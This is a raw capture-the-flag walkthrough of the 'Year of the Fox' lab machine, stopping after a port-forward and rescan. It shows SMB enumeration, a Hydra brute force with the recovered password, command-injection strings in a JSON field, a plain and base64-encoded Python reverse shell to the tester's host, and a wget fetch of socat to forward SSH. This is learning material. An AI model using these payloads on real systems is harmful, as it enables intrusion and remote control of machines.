Year of the Fox

Don't underestimate the sly old fox...

Hack the machine and obtain the flags

Start Machine

Can you get past the wily fox?

Answer the questions below

┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots]
└─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.249.21:80
Open 10.10.249.21:139
Open 10.10.249.21:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 18:20 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:20
Completed Parallel DNS resolution of 1 host. at 18:20, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:20
Scanning 10.10.249.21 [3 ports]
Discovered open port 80/tcp on 10.10.249.21
Discovered open port 445/tcp on 10.10.249.21
Discovered open port 139/tcp on 10.10.249.21
Completed Connect Scan at 18:20, 0.19s elapsed (3 total ports)
Initiating Service scan at 18:20
Scanning 3 services on 10.10.249.21
Completed Service scan at 18:20, 11.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.249.21.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 6.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.78s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Nmap scan report for 10.10.249.21
Host is up, received user-set (0.19s latency).
Scanned at 2023-03-25 18:20:36 EDT for 19s

PORT    STATE SERVICE     REASON  VERSION
80/tcp  open  http        syn-ack Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=You want in? Gotta guess the password!
|_http-title: 401 Unauthorized
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: year-of-the-fox
|   NetBIOS computer name: YEAR-OF-THE-FOX\x00
|   Domain name: lan
|   FQDN: year-of-the-fox.lan
|_  System time: 2023-03-25T22:20:49+00:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 3140/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 45749/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 29474/udp): CLEAN (Failed to receive data)
|   Check 4 (port 25502/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   YEAR-OF-THE-FOX<00>  Flags: <unique><active>
|   YEAR-OF-THE-FOX<03>  Flags: <unique><active>
|   YEAR-OF-THE-FOX<20>  Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   YEAROFTHEFOX<00>     Flags: <group><active>
|   YEAROFTHEFOX<1d>     Flags: <unique><active>
|   YEAROFTHEFOX<1e>     Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-03-25T22:20:49
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ smbclient -N -L 10.10.249.21

	Sharename       Type      Comment
	---------       ----      -------
	yotf            Disk      Fox's Stuff -- keep out!
	IPC$            IPC       IPC Service (year-of-the-fox server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	YEAROFTHEFOX         YEAR-OF-THE-FOX

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ smbmap -u anonymous -H 10.10.249.21
[+] Guest session   	IP: 10.10.249.21:445	Name: 10.10.249.21                                      
        Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	yotf                                              	NO ACCESS	Fox's Stuff -- keep out!
	IPC$                                              	NO ACCESS	IPC Service (year-of-the-fox server (Samba, Ubuntu))

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ rpcclient -U "" 10.10.249.21
Password for [WORKGROUP\]:
rpcclient $> enumdomains
name:[YEAR-OF-THE-FOX] idx:[0x0]
name:[Builtin] idx:[0x1]
rpcclient $> enumdomusers
user:[fox] rid:[0x3e8]
rpcclient $> quit

──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ sudo crackmapexec smb 10.10.249.21 -u 'guest' -p '' --rid-brute
SMB         10.10.249.21    445    YEAR-OF-THE-FOX  [*] Windows 6.1 (name:YEAR-OF-THE-FOX) (domain:lan) (signing:False) (SMBv1:True)
SMB         10.10.249.21    445    YEAR-OF-THE-FOX  [+] lan\guest: 
SMB         10.10.249.21    445    YEAR-OF-THE-FOX  [+] Brute forcing RIDs
Traceback (most recent call last):
  File "/usr/bin/crackmapexec", line 8, in <module>
    sys.exit(main())

uhmm not work

┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots]
└─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.249.21:80
Open 10.10.249.21:139
Open 10.10.249.21:445
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 18:20 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 18:20
Completed Parallel DNS resolution of 1 host. at 18:20, 0.02s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 18:20
Scanning 10.10.249.21 [3 ports]
Discovered open port 80/tcp on 10.10.249.21
Discovered open port 445/tcp on 10.10.249.21
Discovered open port 139/tcp on 10.10.249.21
Completed Connect Scan at 18:20, 0.19s elapsed (3 total ports)
Initiating Service scan at 18:20
Scanning 3 services on 10.10.249.21
Completed Service scan at 18:20, 11.65s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.249.21.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 6.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.78s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Nmap scan report for 10.10.249.21
Host is up, received user-set (0.19s latency).
Scanned at 2023-03-25 18:20:36 EDT for 19s

PORT    STATE SERVICE     REASON  VERSION
80/tcp  open  http        syn-ack Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=You want in? Gotta guess the password!
|_http-title: 401 Unauthorized
139/tcp open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: YEAROFTHEFOX)
445/tcp open  netbios-ssn syn-ack Samba smbd 4.7.6-Ubuntu (workgroup: YEAROFTHEFOX)
Service Info: Hosts: year-of-the-fox.lan, YEAR-OF-THE-FOX

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: year-of-the-fox
|   NetBIOS computer name: YEAR-OF-THE-FOX\x00
|   Domain name: lan
|   FQDN: year-of-the-fox.lan
|_  System time: 2023-03-25T22:20:49+00:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 3140/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 45749/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 29474/udp): CLEAN (Failed to receive data)
|   Check 4 (port 25502/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| nbstat: NetBIOS name: YEAR-OF-THE-FOX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
|   YEAR-OF-THE-FOX<00>  Flags: <unique><active>
|   YEAR-OF-THE-FOX<03>  Flags: <unique><active>
|   YEAR-OF-THE-FOX<20>  Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   YEAROFTHEFOX<00>     Flags: <group><active>
|   YEAROFTHEFOX<1d>     Flags: <unique><active>
|   YEAROFTHEFOX<1e>     Flags: <group><active>
| Statistics:
|   0000000000000000000000000000000000
|   0000000000000000000000000000000000
|_  0000000000000000000000000000
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2023-03-25T22:20:49
|_  start_date: N/A

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 18:20
Completed NSE at 18:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.91 seconds

                                                                                     
┌──(witty㉿kali)-[~/bug_hunter/Endpoints/screenshots]
└─$ enum4linux -a 10.10.249.21                                        
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Mar 25 18:27:13 2023

 =========================================( Target Information )=========================================

Target ........... 10.10.249.21
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ============================( Enumerating Workgroup/Domain on 10.10.249.21 )============================


[+] Got domain/workgroup name: YEAROFTHEFOX


 ================================( Nbtstat Information for 10.10.249.21 )================================

Looking up status of 10.10.249.21
	YEAR-OF-THE-FOX <00> -         B <ACTIVE>  Workstation Service
	YEAR-OF-THE-FOX <03> -         B <ACTIVE>  Messenger Service
	YEAR-OF-THE-FOX <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	YEAROFTHEFOX    <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	YEAROFTHEFOX    <1d> -         B <ACTIVE>  Master Browser
	YEAROFTHEFOX    <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 10.10.249.21 )===================================


[+] Server 10.10.249.21 allows sessions using username '', password ''


 ================================( Getting domain SID for 10.10.249.21 )================================

Domain Name: YEAROFTHEFOX
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup


 ===================================( OS information on 10.10.249.21 )===================================


[E] Can't get OS info with smbclient


[+] Got OS info for 10.10.249.21 from srvinfo: 
	YEAR-OF-THE-FOXWk Sv PrQ Unx NT SNT year-of-the-fox server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03


 =======================================( Users on 10.10.249.21 )=======================================

index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: fox	Name: fox	Desc: 

user:[fox] rid:[0x3e8]

 =================================( Share Enumeration on 10.10.249.21 )=================================


	Sharename       Type      Comment
	---------       ----      -------
	yotf            Disk      Fox's Stuff -- keep out!
	IPC$            IPC       IPC Service (year-of-the-fox server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	YEAROFTHEFOX         YEAR-OF-THE-FOX

[+] Attempting to map shares on 10.10.249.21

//10.10.249.21/yotf	Mapping: DENIED Listing: N/A Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.249.21/IPC$	Mapping: N/A Listing: N/A Writing: N/A

 ============================( Password Policy Information for 10.10.249.21 )============================



[+] Attaching to 10.10.249.21 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] YEAR-OF-THE-FOX
	[+] Builtin

[+] Password Info for Domain: YEAR-OF-THE-FOX

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient:


Password Complexity: Disabled
Minimum Password Length: 5


 =======================================( Groups on 10.10.249.21 )=======================================


[+] Getting builtin groups:


[+]  Getting builtin group memberships:


[+]  Getting local groups:


[+]  Getting local group memberships:


[+]  Getting domain groups:


[+]  Getting domain group memberships:


 ==================( Users on 10.10.249.21 via RID cycling (RIDS: 500-550,1000-1050) )==================


[I] Found new SID: 
S-1-22-1

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[I] Found new SID: 
S-1-5-32

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\fox (Local User)
S-1-22-1-1001 Unix User\rascal (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-978893743-2663913856-222388731 and logon username '', password ''

S-1-5-21-978893743-2663913856-222388731-501 YEAR-OF-THE-FOX\nobody (Local User)
S-1-5-21-978893743-2663913856-222388731-513 YEAR-OF-THE-FOX\None (Domain Group)
S-1-5-21-978893743-2663913856-222388731-1000 YEAR-OF-THE-FOX\fox (Local User)

 ===============================( Getting printer info for 10.10.249.21 )===============================

No printers returned.


enum4linux complete on Sat Mar 25 18:41:59 2023

This site is asking you to sign in.

GET / HTTP/1.1

Host: 10.10.249.21

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1



HTTP/1.1 401 Unauthorized

Date: Sat, 25 Mar 2023 23:10:24 GMT

Server: Apache/2.4.29 (Ubuntu)

WWW-Authenticate: Basic realm="You want in? Gotta guess the password!"

Content-Length: 459

Connection: close

Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>401 Unauthorized</title>
</head><body>
<h1>Unauthorized</h1>
<p>This server could not verify that you
are authorized to access the document
requested.  Either you supplied the wrong
credentials (e.g., bad password), or your
browser doesn't understand how to supply
the credentials required.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 10.10.249.21 Port 80</address>
</body></html>

https://forums.hak5.org/topic/18815-http-head-or-http-get/

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-head / 

or hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-get -

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ hydra -l rascal -P /usr/share/wordlists/rockyou.txt 10.10.249.21 http-get -t 64
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-25 19:16:33
[WARNING] You must supply the web page as an additional option or via -m, default path set to /
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.249.21:80/
[80][http-get] host: 10.10.249.21   login: rascal   password: iloveyou2
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-25 19:16:57

let's sign in

{"target":"\"||whoami||\""

}
["important-data.txt"]

{"target":"\"$(whoami)\""

}

["Invalid Character"]

{"target":"\";whoami;\""

}
["No file returned"]

blind rce

{"target":"\";ping -c 4 10.8.19.103 ;\""

}

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ sudo tcpdump -i tun0 -n                                        
[sudo] password for witty: 
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
19:27:52.253674 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [S], seq 3220311246, win 64240, options [mss 1460,sackOK,TS val 3382066425 ecr 0,nop,wscale 7], length 0
19:27:52.452323 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [S.], seq 2912484493, ack 3220311247, win 62643, options [mss 1288,sackOK,TS val 743969307 ecr 3382066425,nop,wscale 6], length 0
19:27:52.452422 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 3382066624 ecr 743969307], length 0
19:27:52.452642 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [P.], seq 1:452, ack 1, win 502, options [nop,nop,TS val 3382066624 ecr 743969307], length 451: HTTP: POST /assets/php/search.php HTTP/1.1
19:27:52.650243 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [.], ack 452, win 972, options [nop,nop,TS val 743969498 ecr 3382066624], length 0
19:27:52.650382 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 1, length 64
19:27:52.669309 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 1, length 64
19:27:53.650936 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 2, length 64
19:27:53.650971 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 2, length 64
19:27:54.652264 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 3, length 64
19:27:54.652305 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 3, length 64
19:27:55.653450 IP 10.10.249.21 > 10.8.19.103: ICMP echo request, id 1662, seq 4, length 64
19:27:55.653500 IP 10.8.19.103 > 10.10.249.21: ICMP echo reply, id 1662, seq 4, length 64
19:27:55.847825 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [P.], seq 1:188, ack 452, win 972, options [nop,nop,TS val 743972700 ecr 3382066624], length 187: HTTP: HTTP/1.1 200 OK
19:27:55.847930 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [.], ack 188, win 501, options [nop,nop,TS val 3382070019 ecr 743972700], length 0
19:27:55.847989 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [F.], seq 188, ack 452, win 972, options [nop,nop,TS val 743972701 ecr 3382066624], length 0
19:27:55.849030 IP 10.8.19.103.50908 > 10.10.249.21.80: Flags [F.], seq 452, ack 189, win 501, options [nop,nop,TS val 3382070020 ecr 743972701], length 0
19:27:56.043773 IP 10.10.249.21.80 > 10.8.19.103.50908: Flags [.], ack 453, win 972, options [nop,nop,TS val 743972898 ecr 3382070020], length 0

revshell

{"target":"\";python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.19.103",1338));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")';\""

}

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ rlwrap nc -lvnp 1338
listening on [any] 1338 ...

let's encode it

{"target":"\";echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuOC4xOS4xMDMiLDEzMzgpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCIvYmluL2Jhc2giKSc= | base64 -d | bash;\""

}

┌──(witty㉿kali)-[~/bug_hunter/SQLiDetector]
└─$ rlwrap nc -lvnp 1338
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.249.21] 47020
www-data@year-of-the-fox:/var/www/html/assets/php$ which python
which python
/usr/bin/python
www-data@year-of-the-fox:/var/www/html/assets/php$ python -c 'import pty;pty.spawn("/bin/bash")'
</php$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@year-of-the-fox:/var/www/html/assets/php$ ls
ls
search.php
www-data@year-of-the-fox:/var/www/html/assets/php$ cd ..
cd ..
www-data@year-of-the-fox:/var/www/html/assets$ ls
ls
css  fonts  images  js	php
www-data@year-of-the-fox:/var/www/html/assets$ cd ..
cd ..
www-data@year-of-the-fox:/var/www/html$ ls
ls
assets	index.html
www-data@year-of-the-fox:/var/www/html$ grep -Ri thm{
grep -Ri thm{
www-data@year-of-the-fox:/var/www/html$ cd ..
cd ..
www-data@year-of-the-fox:/var/www$ grep -Ri thm{
grep -Ri thm{
web-flag.txt:THM{Nzg2ZWQwYWUwN2UwOTU3NDY5ZjVmYTYw}

www-data@year-of-the-fox:/var/www$ netstat -tulpn
netstat -tulpn
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:22            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::445                  :::*                    LISTEN      -                   
tcp6       0      0 :::139                  :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
udp        0      0 127.0.0.53:53           0.0.0.0:*                           -                   
udp        0      0 10.10.249.21:68         0.0.0.0:*                           -                   
udp        0      0 10.10.255.255:137       0.0.0.0:*                           -                   
udp        0      0 10.10.249.21:137        0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -                   
udp        0      0 10.10.255.255:138       0.0.0.0:*                           -                   
udp        0      0 10.10.249.21:138        0.0.0.0:*                           -                   
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -     

www-data@year-of-the-fox:/var/www$ netstat -tulw | grep ssh
netstat -tulw | grep ssh
tcp        0      0 localhost:ssh           0.0.0.0:*               LISTEN  

port forwarding

┌──(witty㉿kali)-[~/Downloads]
└─$ cp /usr/bin/chisel chisel
                                               
┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.249.21 - - [25/Mar/2023 19:47:49] "GET /chisel HTTP/1.1" 200 -

www-data@year-of-the-fox:/var/www$ cd /tmp
cd /tmp
www-data@year-of-the-fox:/tmp$ ls
ls

┌──(witty㉿kali)-[~/Downloads]
└─$ locate socat                
/usr/bin/socat

┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.249.21 - - [25/Mar/2023 20:32:39] "GET /socat HTTP/1.1" 200 -


www-data@year-of-the-fox:/tmp$ wget http://10.8.19.103:1234/socat
wget http://10.8.19.103:1234/socat
--2023-03-26 00:32:40--  http://10.8.19.103:1234/socat
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 411624 (402K) [application/octet-stream]
Saving to: 'socat'
www-data@year-of-the-fox:/tmp$ chmod +x socat
chmod +x socat
www-data@year-of-the-fox:/tmp$ ./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
<cat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
./socat: error while loading shared libraries: libssl.so.3: cannot open shared object file: No such file or directory

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat

download it , I was trying with chisel and shuttle but couldn't do it

www-data@year-of-the-fox:/tmp$ rm socat
rm socat
www-data@year-of-the-fox:/tmp$ wget http://10.8.19.103:1234/socat
wget http://10.8.19.103:1234/socat
--2023-03-26 00:50:31--  http://10.8.19.103:1234/socat
Connecting to 10.8.19.103:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 375176 (366K) [application/octet-stream]
Saving to: 'socat'

www-data@year-of-the-fox:/tmp$ chmod +x socat
chmod +x socat
www-data@year-of-the-fox:/tmp$ ./socat tcp-listen:8888,reuseaddr,fork tcp:localhost:22
<cat tcp-listen:8888,reuseaddr,fork tcp:localhost:22

┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.249.21 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.249.21:80
